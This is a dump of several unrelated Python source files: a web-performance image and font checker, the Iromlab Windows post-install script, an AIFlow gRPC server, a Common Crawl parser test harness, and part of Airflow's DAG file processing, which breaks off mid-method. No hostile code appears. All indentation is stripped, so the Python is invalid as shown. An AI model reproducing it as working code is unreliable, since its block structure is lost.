pos += 1
if block == 0x01 or (block >= 0xd0 and block <= 0xd9):
continue
elif block == 0xda: # Image data
check['scan_count'] += 1
# Seek to the next non-padded 0xff to find the next marker
found = False
while not found and pos < content_length:
value = struct.unpack('B', body[pos])[0]
pos += 1
if value == 0xff:
value = struct.unpack('B', body[pos])[0]
pos += 1
if value != 0x00:
found = True
pos -= 2
else:
chunk = body[pos: pos + 2]
block_size = struct.unpack('2B', chunk)
pos += 2
block_size = block_size[0] * 256 + block_size[1] - 2
pos += block_size
except Exception:
logging.exception('Error scanning JPEG')
self.progressive_results[request_id] = check
except Exception:
logging.exception('Error checking progressive')
self.progressive_time = monotonic() - start
def check_fonts(self):
"""Check each request to extract metadata about fonts"""
start = monotonic()
try:
from fontTools.ttLib import TTFont
for request_id in self.requests:
try:
request = self.requests[request_id]
if 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type is not None and sniff_type in ['OTF', 'TTF', 'WOFF', 'WOFF2']:
tables = None
ttf = TTFont(request['body'], lazy=True)
reader = ttf.reader
tags = sorted(reader.keys())
for tag in tags:
entry = reader.tables[tag]
if tables is None:
tables = {}
tables[tag] = entry.length
ttf.close()
if tables is not None:
self.font_results[request_id] = {'table_sizes': tables}
except Exception:
logging.exception('Error checking font')
except Exception:
pass
self.font_time = monotonic() - start
def get_header_value(self, headers, name):
"""Get the value for the requested header"""
value = None
if headers:
if name in headers:
value = headers[name]
else:
find = name.lower()
for header_name in headers:
check = header_name.lower()
if check == find or (check[0] == ':' and check[1:] == find):
value = headers[header_name]
break
return value
def sniff_content(self, raw_bytes):
"""Check the beginning of the file to see if it is a known image type"""
content_type = None
hex_bytes = binascii.hexlify(raw_bytes[:14])
# spell-checker: disable
if hex_bytes[0:6] == b'ffd8ff':
content_type = 'jpeg'
elif hex_bytes[0:16] == b'89504e470d0a1a0a':
content_type = 'png'
elif raw_bytes[:6] == b'GIF87a' or raw_bytes[:6] == b'GIF89a':
content_type = 'gif'
elif raw_bytes[:4] == b'RIFF' and raw_bytes[8:14] == b'WEBPVP':
content_type = 'webp'
elif raw_bytes[:4] == b'OTTO':
content_type = 'OTF'
elif raw_bytes[:4] == b'ttcf':
content_type = 'TTF'
elif raw_bytes[:4] == b'wOFF':
content_type = 'WOFF'
elif raw_bytes[:4] == b'wOF2':
content_type = 'WOFF2'
# spell-checker: enable
return content_type
def sniff_file_content(self, image_file):
"""Sniff the content type from a file"""
content_type = None
with open(image_file, 'rb') as f_in:
raw = f_in.read(14)
content_type = self.sniff_content(raw)
return content_type
|
configure.pyw
|
#! /usr/bin/env python
"""Post-install / configuration script for Iromlab"""
import os
import sys
import imp
import site
import sysconfig
from shutil import copyfile
import threading
import logging
import pythoncom
from win32com.client import Dispatch
try:
import tkinter as tk # Python 3.x
import tkinter.scrolledtext as ScrolledText
import tkinter.messagebox as tkMessageBox
except ImportError:
import Tkinter as tk # Python 2.x
import ScrolledText
import tkMessageBox
def errorExit(error):
"""Show error message in messagebox and then exit after userv presses OK"""
tkMessageBox.showerror("Error", error)
os._exit(0)
def get_reg(name, path):
"""Read variable from Windows Registry"""
import winreg
# From http://stackoverflow.com/a/35286642
try:
registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path, 0,
winreg.KEY_READ)
value, regtype = winreg.QueryValueEx(registry_key, name)
winreg.CloseKey(registry_key)
return value
except WindowsError:
return None
def main_is_frozen():
return (hasattr(sys, "frozen") or # new py2exe
hasattr(sys, "importers") # old py2exe
or imp.is_frozen("__main__")) # tools/freeze
def get_main_dir():
if main_is_frozen():
return os.path.dirname(sys.executable)
return os.path.dirname(sys.argv[0])
def post_install():
"""Install config file + pre-packaged tools to user dir +
Create a Desktop shortcut to the installed software
"""
# This is needed to avoid 'CoInitialize has not been called'
# error with Dispatch. See: https://stackoverflow.com/a/26753031
pythoncom.CoInitialize()
# Package name
packageName = 'iromlab'
# Scripts directory (location of launcher script)
scriptsDir = get_main_dir()
logging.info("Scripts directory: " + scriptsDir)
# Package directory (parent of scriptsDir)
packageDir = os.path.abspath(os.path.join(scriptsDir, os.pardir))
logging.info("Package directory: " + packageDir)
# Part 1: install config file
# Locate Windows user directory
userDir = os.path.expanduser('~')
# Config directory
configDirUser = os.path.join(userDir, packageName)
logging.info("User configuration directory: " + configDirUser)
# Create config directory if it doesn't exist
if not os.path.isdir(configDirUser):
logging.info("Creating user configuration directory ...")
try:
os.makedirs(configDirUser)
logging.info("Done!")
except IOError:
msg = 'could not create configuration directory'
errorExit(msg)
# Config file name
configFileUser = os.path.join(configDirUser, 'config.xml')
if not os.path.isfile(configFileUser):
# No config file in user dir, so copy it from location in package.
# Location is /iromlab/conf/config.xml in 'site-packages' directory
# if installed with pip)
logging.info("Copying configuration file to user directory ...")
# Locate global site-packages dir (this returns multiple entries)
sitePackageDirsGlobal = site.getsitepackages()
# Assumptions: site package dir is called 'site-packages' and is
# unique (?)
for directory in sitePackageDirsGlobal:
if 'site-packages' in directory:
sitePackageDirGlobal = directory
try:
logging.info("Global site package directory: " + sitePackageDirGlobal)
except:
pass
# Locate user site-packages dir
sitePackageDirUser = site.getusersitepackages()
logging.info("User site package directory: " + sitePackageDirUser)
# Determine which site package dir to use
# Convert to lowercase because result of site.getsitepackages()
# sometimes results in lowercase output (observed with Python 3.7 on Windows 10)
if packageDir.lower() in sitePackageDirGlobal.lower():
sitePackageDir = sitePackageDirGlobal
elif packageDir.lower() in sitePackageDirUser.lower():
sitePackageDir = sitePackageDirUser
else:
msg = 'could not establish package dir to use'
errorExit(msg)
logging.info("Site package directory: " + sitePackageDir)
# Construct path to config file
configFilePackage = os.path.join(sitePackageDir, packageName,
'conf', 'config.xml')
if os.path.isfile(configFilePackage):
try:
copyfile(configFilePackage, configFileUser)
logging.info("Done!")
except IOError:
msg = 'could not copy configuration file to ' + configFileUser
errorExit(msg)
# This should never happen but who knows ...
else:
msg = 'no configuration file found in package'
errorExit(msg)
# Part 2: create Desktop shortcut
logging.info("Creating desktop shortcut ...")
try:
# Target of shortcut
target = os.path.join(scriptsDir, packageName + '.exe')
# Name of link file
linkName = packageName + '.lnk'
# Read location of Windows desktop folder from registry
regName = 'Desktop'
regPath = r'Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders'
desktopFolder = os.path.normpath(get_reg(regName, regPath))
logging.info("Desktop directory: " + desktopFolder)
# Path to location of link file
pathLink = os.path.join(desktopFolder, linkName)
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(pathLink)
shortcut.Targetpath = target
shortcut.WorkingDirectory = scriptsDir
shortcut.IconLocation = target
shortcut.save()
logging.info("Done!")
except Exception:
msg = 'Failed to create desktop shortcut'
errorExit(msg)
msg = 'Iromlab configuration completed successfully, click OK to exit!'
tkMessageBox.showinfo("Info", msg)
os._exit(0)
class TextHandler(logging.Handler):
"""This class allows you to log to a Tkinter Text or ScrolledText widget
Adapted from Moshe Kaplan:
https://gist.github.com/moshekaplan/c425f861de7bbf28ef06
"""
def __init__(self, text):
# run the regular Handler __init__
logging.Handler.__init__(self)
# Store a reference to the Text it will log to
self.text = text
def emit(self, record):
msg = self.format(record)
def append():
self.text.configure(state='normal')
self.text.insert(tk.END, msg + '\n')
self.text.configure(state='disabled')
# Autoscroll to the bottom
self.text.yview(tk.END)
# This is necessary because we can't modify the Text from other threads
self.text.after(0, append)
class myGUI(tk.Frame):
"""This class defines the graphical user interface"""
def __init__(self, parent, *args, **kwargs):
tk.Frame.__init__(self, parent, *args, **kwargs)
self.root = parent
self.build_gui()
def build_gui(self):
# Build GUI
self.root.title('Iromlab Configuration Tool')
self.root.option_add('*tearOff', 'FALSE')
self.grid(column=0, row=0, sticky='ew')
self.grid_columnconfigure(0, weight=1, uniform='a')
self.grid_columnconfigure(1, weight=1, uniform='a')
self.grid_columnconfigure(2, weight=1, uniform='a')
self.grid_columnconfigure(3, weight=1, uniform='a')
# Add text widget to display logging info
st = ScrolledText.ScrolledText(self, state='disabled')
st.configure(font='TkFixedFont')
st.grid(column=0, row=1, sticky='w', columnspan=4)
# Create textLogger
text_handler = TextHandler(st)
# Logging configuration
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s')
# Add the handler to logger
logger = logging.getLogger()
logger.addHandler(text_handler)
def main():
"""Main function"""
root = tk.Tk()
myGUI(root)
t1 = threading.Thread(target=post_install, args=[])
t1.start()
root.mainloop()
t1.join()
if __name__ == "__main__":
main()
|
server.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import asyncio
import functools
import inspect
import logging
import os
import sys
import tempfile
import threading
import time
from concurrent import futures
from typing import Dict
import grpc
from grpc import _common, _server
from grpc._cython.cygrpc import StatusCode
from grpc._server import _serialize_response, _status, _abort, _Context, _unary_request, \
_select_thread_pool_for_behavior, _unary_response_in_pool
from ai_flow.endpoint.server.high_availability import SimpleAIFlowServerHaManager, HighAvailableService
from ai_flow.endpoint.server.server_config import DBType
from ai_flow.metadata_store.service.service import MetadataService
from ai_flow.metric.service.metric_service import MetricService
from ai_flow.model_center.service.service import ModelCenterService
from ai_flow.protobuf.high_availability_pb2_grpc import add_HighAvailabilityManagerServicer_to_server
from ai_flow.scheduler_service.service.service import SchedulerService, SchedulerServiceConfig
from ai_flow.store.db.base_model import base
from ai_flow.store.db.db_util import extract_db_engine_from_uri, create_db_store
from ai_flow.store.mongo_store import MongoStoreConnManager
from ai_flow.store.sqlalchemy_store import SqlAlchemyStore
from ai_flow.util import sqlalchemy_db
from notification_service.proto import notification_service_pb2_grpc
from notification_service.service import NotificationService
sys.path.append(os.path.abspath(os.path.join(os.getcwd(), "../../..")))
from ai_flow.protobuf import model_center_service_pb2_grpc, \
metadata_service_pb2_grpc, metric_service_pb2_grpc, scheduling_service_pb2_grpc
_PORT = '50051'
_ONE_DAY_IN_SECONDS = 60 * 60 * 24
class AIFlowServer(object):
"""
Block/Async server of an AIFlow Rest Endpoint that provides Metadata/Model/Notification function service.
"""
def __init__(self,
store_uri=None,
port=_PORT,
notification_server_uri=None,
start_meta_service: bool = True,
start_model_center_service: bool = True,
start_metric_service: bool = True,
start_scheduler_service: bool = True,
scheduler_service_config: Dict = None,
enabled_ha: bool = False,
ha_manager=None,
ha_server_uri=None,
ha_storage=None,
ttl_ms: int = 10000):
self.store_uri = store_uri
self.db_type = DBType.value_of(extract_db_engine_from_uri(store_uri))
self.executor = Executor(futures.ThreadPoolExecutor(max_workers=10))
self.server = grpc.server(self.executor)
self.enabled_ha = enabled_ha
self.start_scheduler_service = start_scheduler_service
server_uri = 'localhost:{}'.format(port)
if start_model_center_service:
logging.info("start model center service.")
model_center_service_pb2_grpc.add_ModelCenterServiceServicer_to_server(
ModelCenterService(store_uri=store_uri,
notification_server_uri=notification_server_uri),
self.server)
if start_meta_service:
logging.info("start meta service.")
metadata_service_pb2_grpc.add_MetadataServiceServicer_to_server(
MetadataService(db_uri=store_uri, server_uri=server_uri), self.server)
if start_metric_service:
logging.info("start metric service.")
metric_service_pb2_grpc.add_MetricServiceServicer_to_server(MetricService(db_uri=store_uri), self.server)
if start_scheduler_service:
self._add_scheduler_service(scheduler_service_config, store_uri, notification_server_uri)
if enabled_ha:
self._add_ha_service(ha_manager, ha_server_uri, ha_storage, store_uri, ttl_ms)
self.server.add_insecure_port('[::]:' + str(port))
self._stop = threading.Event()
def _add_scheduler_service(self, scheduler_service_config, db_uri, notification_server_uri):
logging.info("start scheduler service.")
real_config = SchedulerServiceConfig(scheduler_service_config)
self.scheduler_service = SchedulerService(real_config, db_uri, notification_server_uri)
scheduling_service_pb2_grpc.add_SchedulingServiceServicer_to_server(self.scheduler_service,
self.server)
def _add_ha_service(self, ha_manager, ha_server_uri, ha_storage, store_uri, ttl_ms):
if ha_manager is None:
ha_manager = SimpleAIFlowServerHaManager()
if ha_server_uri is None:
raise ValueError("ha_server_uri is required with ha enabled!")
if ha_storage is None:
ha_storage = create_db_store(store_uri)
self.ha_service = HighAvailableService(ha_manager, ha_server_uri, ha_storage, ttl_ms)
add_HighAvailabilityManagerServicer_to_server(self.ha_service, self.server)
def run(self, is_block=False):
if self.enabled_ha:
self.ha_service.start()
self.server.start()
if self.start_scheduler_service:
self.scheduler_service.start()
logging.info('AIFlow server started.')
if is_block:
try:
while not self._stop.is_set():
self._stop.wait(_ONE_DAY_IN_SECONDS)
except KeyboardInterrupt:
logging.info("received KeyboardInterrupt")
self.stop()
else:
pass
def stop(self, clear_sql_lite_db_file=False):
logging.info("stopping AIFlow server")
if self.start_scheduler_service:
self.scheduler_service.stop()
self.server.stop(0)
if self.enabled_ha:
self.ha_service.stop()
self.executor.shutdown()
if self.db_type == DBType.SQLITE and clear_sql_lite_db_file:
sqlalchemy_db.clear_db(self.store_uri, base.metadata)
os.remove(self.store_uri[10:])
elif self.db_type == DBType.MONGODB:
MongoStoreConnManager().disconnect_all()
self._stop.set()
logging.info('AIFlow server stopped.')
def _clear_db(self):
if self.db_type == DBType.SQLITE:
sqlalchemy_db.reset_db(self.store_uri, base.metadata)
elif self.db_type == DBType.MONGODB:
MongoStoreConnManager().drop_all()
def _loop(loop: asyncio.AbstractEventLoop):
asyncio.set_event_loop(loop)
if not loop.is_running() or loop.is_closed():
loop.run_forever()
pending = asyncio.all_tasks(loop=loop)
if pending:
loop.run_until_complete(asyncio.gather(*pending))
class Executor(futures.Executor):
def __init__(self, thread_pool, loop=None):
super().__init__()
self._shutdown = False
self._thread_pool = thread_pool
self._loop = loop or asyncio.get_event_loop()
if not self._loop.is_running() or self._loop.is_closed():
self._thread = threading.Thread(target=_loop, args=(self._loop,), daemon=True)
self._thread.start()
def submit(self, fn, *args, **kwargs):
if self._shutdown:
raise RuntimeError('Cannot schedule new futures after shutdown.')
if not self._loop.is_running():
raise RuntimeError('Loop must be started before any function could be submitted.')
if inspect.iscoroutinefunction(fn):
coroutine = fn(*args, **kwargs)
return asyncio.run_coroutine_threadsafe(coroutine, self._loop)
else:
func = functools.partial(fn, *args, **kwargs)
return self._loop.run_in_executor(self._thread_pool, func)
def shutdown(self, wait=True):
self._shutdown = True
if wait:
self._thread_pool.shutdown()
async def _call_behavior_async(rpc_event, state, behavior, argument, request_deserializer):
context = _Context(rpc_event, state, request_deserializer)
try:
return await behavior(argument, context), True
except Exception as e:
with state.condition_type:
if e not in state.rpc_errors:
logging.exception(e)
_abort(state, rpc_event.operation_call, StatusCode.unknown, _common.encode(e))
return None, False
async def _unary_response_in_pool_async(rpc_event, state, behavior, argument_thunk, request_deserializer,
response_serializer):
argument = argument_thunk()
if argument is not None:
response, proceed = await _call_behavior_async(rpc_event, state, behavior, argument, request_deserializer)
if proceed:
serialized_response = _serialize_response(rpc_event, state, response, response_serializer)
if serialized_response is not None:
_status(rpc_event, state, serialized_response)
def _handle_unary_unary(rpc_event, state, method_handler, default_thread_pool):
unary_request = _unary_request(rpc_event, state, method_handler.request_deserializer)
thread_pool = _select_thread_pool_for_behavior(method_handler.unary_unary, default_thread_pool)
if asyncio.iscoroutinefunction(method_handler.unary_unary):
return thread_pool.submit(_unary_response_in_pool_async, rpc_event, state, method_handler.unary_unary,
unary_request, method_handler.request_deserializer,
method_handler.response_serializer)
else:
return thread_pool.submit(_unary_response_in_pool, rpc_event, state, method_handler.unary_unary, unary_request,
method_handler.request_deserializer, method_handler.response_serializer)
_server._handle_unary_unary = _handle_unary_unary
if __name__ == '__main__':
fd, temp_db_file = tempfile.mkstemp()
os.close(fd)
store_uri = '%s%s' % ('sqlite:///', temp_db_file)
server = AIFlowServer(store_uri=store_uri)
server.run(is_block=True)
|
commoncrawl.py
|
# coding: utf-8
import getopt, sys, os, stat, subprocess
from multiprocessing import Process
import warc
cmd_wget = ["wget", "-q"]
cmp_unzip = ["gzip", "-qq", "-d"]
commoncrawl_url = "https://commoncrawl.s3.amazonaws.com"
def run_test(file_list, bin_parser, save_to = ".", threads_count = 10):
f = open(file_list, "r")
for line in f:
url = ("%s/%s" % (commoncrawl_url, line)).strip()
print("Begin download: " + url)
cmd_wget.append(url)
proc = subprocess.run(cmd_wget)
del cmd_wget[-1]
if proc.returncode:
continue
warc_filename = os.path.basename(url)
print("Unzip file: " + warc_filename)
cmp_unzip.append(warc_filename)
proc = subprocess.run(cmp_unzip)
del cmp_unzip[-1]
if proc.returncode:
os.remove(warc_filename)
continue
orig_filename = os.path.splitext(warc_filename)[0]
print("Begin process:" + orig_filename)
parsed = process_warc(threads_count, bin_parser, orig_filename, url, save_to)
print("Total parsed: %s" % parsed)
os.remove(orig_filename)
def process_warc(threads_count, bin_parser, file_name, base_url, save_to = "."):
warc_file = warc.open(file_name, 'rb')
plist = []
parsed = 0
for idx, record in enumerate(warc_file):
url = record.url
if not url:
continue
payload = record.payload.read()
header, html = payload.split(b'\r\n\r\n', maxsplit=1)
if url and html:
plist.append(Process(target=read_doc, args=[bin_parser, save_to, base_url, idx, html]))
plist[-1].start()
parsed += 1
if (idx % 100) == 0:
print("%s" % idx)
if len(plist) == threads_count:
for p in plist:
p.join()
plist = []
for p in plist:
p.join()
warc_file.close()
return parsed
def read_doc(bin_parser, save_to, base_url, idx, html):
parser = subprocess.Popen([bin_parser], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
parser.stdin.write(html)
parser.stdin.close()
rdata = parser.stdout.read()
parser.stdout.close()
parser.wait()
if parser.returncode != 0:
fp_base = os.path.basename(base_url)
filename = "%s-%s-%s.errlog" % (os.path.splitext(fp_base)[0], save_to, idx)
f = open(os.path.normpath(filename), 'wb')
f.write(html)
f.close()
return len(html), len(rdata), parser.returncode
if __name__ == "__main__":
run_test(file_list = "warc.paths",
bin_parser = "../../build/test/lexbor/html/lexbor_html_commoncrawl",
save_to = ".", threads_count = 30)
|
dag_processing.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import enum
import importlib
import logging
import multiprocessing
import os
import re
import signal
import sys
import time
import zipfile
from abc import ABCMeta, abstractmethod
from datetime import datetime, timedelta
from importlib import import_module
from typing import Iterable, NamedTuple, Optional
import psutil
from setproctitle import setproctitle
from sqlalchemy import or_
from tabulate import tabulate
# To avoid circular imports
import airflow.models
from airflow.configuration import conf
from airflow.dag.base_dag import BaseDag, BaseDagBag
from airflow.exceptions import AirflowException
from airflow.models import errors
from airflow.settings import STORE_SERIALIZED_DAGS
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.db import provide_session
from airflow.utils.helpers import reap_process_group
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.state import State
class SimpleDag(BaseDag):
"""
A simplified representation of a DAG that contains all attributes
required for instantiating and scheduling its associated tasks.
:param dag: the DAG
:type dag: airflow.models.DAG
:param pickle_id: ID associated with the pickled version of this DAG.
:type pickle_id: unicode
"""
def __init__(self, dag, pickle_id=None):
self._dag_id = dag.dag_id
self._task_ids = [task.task_id for task in dag.tasks]
self._full_filepath = dag.full_filepath
self._is_paused = dag.is_paused
self._concurrency = dag.concurrency
self._pickle_id = pickle_id
self._task_special_args = {}
for task in dag.tasks:
special_args = {}
if task.task_concurrency is not None:
special_args['task_concurrency'] = task.task_concurrency
if len(special_args) > 0:
self._task_special_args[task.task_id] = special_args
@property
def dag_id(self):
"""
:return: the DAG ID
:rtype: unicode
"""
return self._dag_id
@property
def task_ids(self):
"""
:return: A list of task IDs that are in this DAG
:rtype: list[unicode]
"""
return self._task_ids
@property
def full_filepath(self):
"""
:return: The absolute path to the file that contains this DAG's definition
:rtype: unicode
"""
return self._full_filepath
@property
def concurrency(self):
"""
:return: maximum number of tasks that can run simultaneously from this DAG
:rtype: int
"""
return self._concurrency
@property
def is_paused(self):
"""
:return: whether this DAG is paused or not
:rtype: bool
"""
return self._is_paused
@property
def pickle_id(self):
"""
:return: The pickle ID for this DAG, if it has one. Otherwise None.
:rtype: unicode
"""
return self._pickle_id
@property
def task_special_args(self):
return self._task_special_args
def get_task_special_arg(self, task_id, special_arg_name):
if task_id in self._task_special_args and special_arg_name in self._task_special_args[task_id]:
return self._task_special_args[task_id][special_arg_name]
else:
return None
class SimpleTaskInstance:
def __init__(self, ti):
self._dag_id = ti.dag_id
self._task_id = ti.task_id
self._execution_date = ti.execution_date
self._start_date = ti.start_date
self._end_date = ti.end_date
self._try_number = ti.try_number
self._state = ti.state
self._executor_config = ti.executor_config
if hasattr(ti, 'run_as_user'):
self._run_as_user = ti.run_as_user
else:
self._run_as_user = None
if hasattr(ti, 'pool'):
self._pool = ti.pool
else:
self._pool = None
if hasattr(ti, 'priority_weight'):
self._priority_weight = ti.priority_weight
else:
self._priority_weight = None
self._queue = ti.queue
self._key = ti.key
@property
def dag_id(self):
return self._dag_id
@property
def task_id(self):
return self._task_id
@property
def execution_date(self):
return self._execution_date
@property
def start_date(self):
return self._start_date
@property
def end_date(self):
return self._end_date
@property
def try_number(self):
return self._try_number
@property
def state(self):
return self._state
@property
def pool(self):
return self._pool
@property
def priority_weight(self):
return self._priority_weight
@property
def queue(self):
return self._queue
@property
def key(self):
return self._key
@property
def executor_config(self):
return self._executor_config
@provide_session
def construct_task_instance(self, session=None, lock_for_update=False):
"""
Construct a TaskInstance from the database based on the primary key
:param session: DB session.
:param lock_for_update: if True, indicates that the database should
lock the TaskInstance (issuing a FOR UPDATE clause) until the
session is committed.
"""
TI = airflow.models.TaskInstance
qry = session.query(TI).filter(
TI.dag_id == self._dag_id,
TI.task_id == self._task_id,
TI.execution_date == self._execution_date)
if lock_for_update:
ti = qry.with_for_update().first()
else:
ti = qry.first()
return ti
class SimpleDagBag(BaseDagBag):
"""
A collection of SimpleDag objects with some convenience methods.
"""
def __init__(self, simple_dags):
"""
Constructor.
:param simple_dags: SimpleDag objects that should be in this
:type list(airflow.utils.dag_processing.SimpleDagBag)
"""
self.simple_dags = simple_dags
self.dag_id_to_simple_dag = {}
for simple_dag in simple_dags:
self.dag_id_to_simple_dag[simple_dag.dag_id] = simple_dag
@property
def dag_ids(self):
"""
:return: IDs of all the DAGs in this
:rtype: list[unicode]
"""
return self.dag_id_to_simple_dag.keys()
def get_dag(self, dag_id):
"""
:param dag_id: DAG ID
:type dag_id: unicode
:return: if the given DAG ID exists in the bag, return the BaseDag
corresponding to that ID. Otherwise, throw an Exception
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if dag_id not in self.dag_id_to_simple_dag:
raise AirflowException("Unknown DAG ID {}".format(dag_id))
return self.dag_id_to_simple_dag[dag_id]
def correct_maybe_zipped(fileloc):
"""
If the path contains a folder with a .zip suffix, then
the folder is treated as a zip archive and path to zip is returned.
"""
_, archive, _ = re.search(r'((.*\.zip){})?(.*)'.format(re.escape(os.sep)), fileloc).groups()
if archive and zipfile.is_zipfile(archive):
return archive
else:
return fileloc
COMMENT_PATTERN = re.compile(r"\s*#.*")
def list_py_file_paths(directory, safe_mode=conf.getboolean('core', 'DAG_DISCOVERY_SAFE_MODE', fallback=True),
include_examples=None):
"""
Traverse a directory and look for Python files.
:param directory: the directory to traverse
:type directory: unicode
:param safe_mode: whether to use a heuristic to determine whether a file
contains Airflow DAG definitions. If not provided, use the
core.DAG_DISCOVERY_SAFE_MODE configuration setting. If not set, default
to safe.
:type safe_mode: bool
:param include_examples: include example DAGs
:type include_examples: bool
:return: a list of paths to Python files in the specified directory
:rtype: list[unicode]
"""
if include_examples is None:
include_examples = conf.getboolean('core', 'LOAD_EXAMPLES')
file_paths = []
if directory is None:
return []
elif os.path.isfile(directory):
return [directory]
elif os.path.isdir(directory):
patterns_by_dir = {}
for root, dirs, files in os.walk(directory, followlinks=True):
patterns = patterns_by_dir.get(root, [])
ignore_file = os.path.join(root, '.airflowignore')
if os.path.isfile(ignore_file):
with open(ignore_file, 'r') as file:
# If we have new patterns create a copy so we don't change
# the previous list (which would affect other subdirs)
lines_no_comments = [COMMENT_PATTERN.sub("", line) for line in file.read().split("\n")]
patterns += [re.compile(line) for line in lines_no_comments if line]
# If we can ignore any subdirs entirely we should - fewer paths
# to walk is better. We have to modify the ``dirs`` array in
# place for this to affect os.walk
dirs[:] = [
d
for d in dirs
if not any(p.search(os.path.join(root, d)) for p in patterns)
]
# We want patterns defined in a parent folder's .airflowignore to
# apply to subdirs too
for d in dirs:
patterns_by_dir[os.path.join(root, d)] = patterns
for f in files:
try:
file_path = os.path.join(root, f)
if not os.path.isfile(file_path):
continue
_, file_ext = os.path.splitext(os.path.split(file_path)[-1])
if file_ext != '.py' and not zipfile.is_zipfile(file_path):
continue
if any([re.findall(p, file_path) for p in patterns]):
continue
# Heuristic that guesses whether a Python file contains an
# Airflow DAG definition.
might_contain_dag = True
if safe_mode and not zipfile.is_zipfile(file_path):
with open(file_path, 'rb') as fp:
content = fp.read()
might_contain_dag = all(
[s in content for s in (b'DAG', b'airflow')])
if not might_contain_dag:
continue
file_paths.append(file_path)
except Exception:
log = LoggingMixin().log
log.exception("Error while examining %s", f)
if include_examples:
import airflow.example_dags
example_dag_folder = airflow.example_dags.__path__[0]
file_paths.extend(list_py_file_paths(example_dag_folder, safe_mode, False))
return file_paths
class AbstractDagFileProcessor(metaclass=ABCMeta):
"""
Processes a DAG file. See SchedulerJob.process_file() for more details.
"""
@abstractmethod
def start(self):
"""
Launch the process to process the file
"""
raise NotImplementedError()
@abstractmethod
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file
"""
raise NotImplementedError()
@property
@abstractmethod
def pid(self):
"""
:return: the PID of the process launched to process the given file
"""
raise NotImplementedError()
@property
@abstractmethod
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
raise NotImplementedError()
@property
@abstractmethod
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
raise NotImplementedError()
@property
@abstractmethod
def result(self):
"""
A list of simple dags found, and the number of import errors
:return: result of running SchedulerJob.process_file()
:rtype: tuple[list[airflow.utils.dag_processing.SimpleDag], int]
"""
raise NotImplementedError()
@property
@abstractmethod
def start_time(self):
"""
:return: When this started to process the file
:rtype: datetime
"""
raise NotImplementedError()
@property
@abstractmethod
def file_path(self):
"""
:return: the path to the file that this is processing
:rtype: unicode
"""
raise NotImplementedError()
DagParsingStat = NamedTuple('DagParsingStat', [
('file_paths', Iterable[str]),
('done', bool),
('all_files_processed', bool)
])
DagFileStat = NamedTuple('DagFileStat', [
('num_dags', int),
('import_errors', int),
('last_finish_time', datetime),
('last_duration', float),
('run_count', int),
])
class DagParsingSignal(enum.Enum):
AGENT_HEARTBEAT = 'agent_heartbeat'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing
related jobs in scheduler process. Mainly it can spin up DagFileProcessorManager
in a subprocess, collect DAG parsing results from it and communicate
signal/DAG parsing stat with it.
This class runs in the main `airflow scheduler` process.
"""
def __init__(self,
dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
async_mode):
"""
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param file_paths: list of file paths that contain DAG definitions
:type file_paths: list[unicode]
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path, log_file_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessor)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param async_mode: Whether to start agent in async mode
:type async_mode: bool
"""
self._file_paths = file_paths
self._file_path_queue = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._processor_timeout = processor_timeout
self._async_mode = async_mode
# Map from file path to the processor
self._processors = {}
# Pipe for communicating signals
self._process = None
self._done = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn = None
self._collected_dag_buffer = []
def start(self):
"""
Launch DagFileProcessorManager processor and start DAG parsing loop in manager.
"""
self._parent_signal_conn, child_signal_conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._file_paths,
self._max_runs,
self._processor_factory,
self._processor_timeout,
child_signal_conn,
self._async_mode,
)
)
self._process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", self._process.pid)
def heartbeat(self):
"""
Should only be used when launched DAG file processor manager in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_HEARTBEAT)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_simple_dags calls _heartbeat_manager.
pass
